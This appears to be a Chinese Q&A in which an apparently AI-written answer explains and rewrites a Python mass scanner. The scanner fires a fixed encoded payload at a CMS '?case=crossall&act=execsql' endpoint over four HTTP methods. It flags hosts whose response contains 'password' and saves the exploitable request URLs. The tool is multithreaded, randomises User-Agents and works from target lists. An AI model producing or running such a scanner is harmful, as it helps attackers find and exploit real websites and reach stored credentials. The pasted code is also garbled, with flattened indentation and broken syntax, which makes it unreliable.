分析下面代码输出部分改为输出存在sql注入的具体请求url给出具体的代码import requestsimport sysimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport reimport randomimport

该代码是一个基于多线程的URL检测脚本，主要用于检测URL是否存在SQL注入漏洞。其检测逻辑如下：

1.发送GET请求，请求URL + “/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5”，如果响应码为200且响应内容中包含“password”，则判断该URL存在注入漏洞；

2.如果第一步检测不成功，则发送POST请求，请求URL + “/?case=crossall&act=execsql”，请求参数为“sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5”，如果响应码为200且响应内容中包含“password”，则判断该URL存在注入漏洞；

3.如果第二步检测不成功，则发送PUT请求，请求URL + “/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5”，请求参数为“Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5”，请求头中指定Content-Type为“application/x-www-form-urlencoded”，如果响应码为200且响应内容中包含“password”，则判断该URL存在注入漏洞；

4.如果第三步检测不成功，则发送DELETE请求，请求URL + “/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5”，请求头中指定Content-Type为“application/x-www-form-urlencoded”，如果响应码为200且响应内容中包含“password”，则判断该URL存在注入漏洞；

5.如果前四步均不成功，则判断该URL不存在注入漏洞。

其中，存在注入漏洞的URL会被输出到控制台，并写入到“vuln.txt”文件中。

存在的问题：

1.该脚本只检测了注入漏洞的存在，没有对注入点进行深入的测试，无法判断注入点的类型和具体的注入语句，存在误报和漏报的风险。

2.该脚本只能检测固定的注入语句，无法应对各种变形和绕过技巧，存在检测不全的风险。

3.该脚本没有对URL进行过滤和去重，可能会存在重复检测和无效检测的情况。

下面是输出存在注入漏洞的具体请求URL的代码：

import requests import sys import urllib3 from argparse import ArgumentParser import threadpool from urllib import parse from time import time import re import random import logging

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

filename = sys.argv[1] url_list = []

def get_ua(): first_num = random.randint(55, 62) third_num = random.randint(0, 3200) fourth_num = random.randint(0, 140) os_type = [ '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(Macintosh; Intel Mac OS X 10_12_6)' ] chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
               '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
              )
return ua

def wirte_targets(vurl, filename): with open(filename, "a+") as f: f.write(vurl + "\n")

def check_url(url): url = parse.urlparse(url) url = '{}://{}'.format(url[0], url[1]) headers = { 'User-Agent': get_ua(), } try: # GET请求 url_1 = url + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" res_1 = requests.get(url_1, verify=False, allow_redirects=False, headers=headers, timeout=5) if res_1.status_code == 200 and 'password' in res_1.text: print("\033[32m[+]{}\033[0m".format(url_1)) wirte_targets(url_1, "vuln.txt") else: # POST请求 url_2 = url + "/?case=crossall&act=execsql" data_2 = {"sql": "Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5"} res_2 = requests.post(url_2, verify=False, allow_redirects=False, headers=headers, data=data_2, timeout=5) if res_2.status_code == 200 and 'password' in res_2.text: print("\033[32m[+]{}\033[0m".format(url_2)) wirte_targets(url_2, "vuln.txt") else: # PUT请求 url_3 = url + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" data_3 = "Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" headers_3 = {"Content-Type": "application/x-www-form-urlencoded"} res_3 = requests.put(url_3, verify=False, allow_redirects=False, headers=headers_3, data=data_3, timeout=5) if res_3.status_code == 200 and 'password' in res_3.text: print("\033[32m[+]{}\033[0m".format(url_3)) wirte_targets(url_3, "vuln.txt") else: # DELETE请求 url_4 = url + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" headers_4 = {"Content-Type": "application/x-www-form-urlencoded"} res_4 = requests.delete(url_4, verify=False, allow_redirects=False, headers=headers_4, timeout=5) if res_4.status_code == 200 and 'password' in res_4.text: print("\033[32m[+]{}\033[0m".format(url_4)) wirte_targets(url_4, "vuln.txt") else: pass

except Exception as e:
    logging.error(e)

def multithreading(url_list, pools=5): works = [] for i in url_list: works.append(i) pool = threadpool.ThreadPool(pools) reqs = threadpool.makeRequests(check_url, works) [pool.putRequest(req) for req in reqs] pool.wait()

if name == 'main': arg = ArgumentParser(description='check_url By m2') arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port") arg.add_argument("-f", "--file", help="Target URL; Example:url.txt") args = arg.parse_args() url = args.url filename = args.file print("[+]任务开始.....") start = time() if url != None and filename == None: check_url(url) elif url == None and filename != None: for i in open(filename): i = i.replace('\n', '') url_list.append(i) multithreading(url_list, 10) end = time() print('任务完成,用时%ds.' % (end - start)